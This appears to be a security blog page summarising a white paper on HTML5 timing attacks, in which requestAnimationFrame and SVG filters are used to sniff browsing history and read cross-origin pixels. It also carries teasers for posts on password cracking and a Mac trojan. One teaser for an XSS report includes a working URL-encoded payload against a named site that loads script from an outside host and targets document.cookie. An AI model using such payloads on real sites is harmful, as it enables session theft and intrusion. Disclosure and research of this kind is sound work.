timing_attacks

HTML 5 and related technologies bring a whole slew of new features to web browsers, some of which can be a threat to security and privacy. This paper describes a number of new timing attack techniques that can be used by a malicious web page to steal sensitive data from modern web browsers, breaking cross-origin restrictions.

The new HTML5 request AnimationFrame API can be used to time browser rendering operations and infer sensitive data based on timing data. Two techniques are demonstrated which use this API to exploit timing attacks against Chrome, Internet Explorer and Firefox in order to infer browsing history and read cross-origin data from other websites. The first technique allows the browser history to be sniffed by detecting redraw events. The second shows how SVG filters can be used to read pixel values from a web page. This allows pixels from cross-origin iframes to be read using an OCR-style technique to obtain sensitive data from websites.

Read the white paper

Explore More

Common Scams

* Password Cracking Password cracking is a common way to retrieve a password by repeatedly trying to guess for the password. The most common method of password cracking is guessing

Read More

More Trojan horse for Apple Mac! Is Mac more insecure than windows?

One more malware have been spotted for the Apple Mac machine. This time Trojan.iServices.B which gets into the system, open the backdoor in Mac machines and connect them to a

Read More

critical XSS Vulnerability on Ygncos Shorten Url

PlanetCreator has reported another critical XSS Vulnerability on Ygncos Shorten Url : http://www.ygn.me This vulnerability has been informed to :- webmaster Test Link http://shorten.ygn.me/index.php?url=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E Cross-site scripting (XSS) is a type

Read More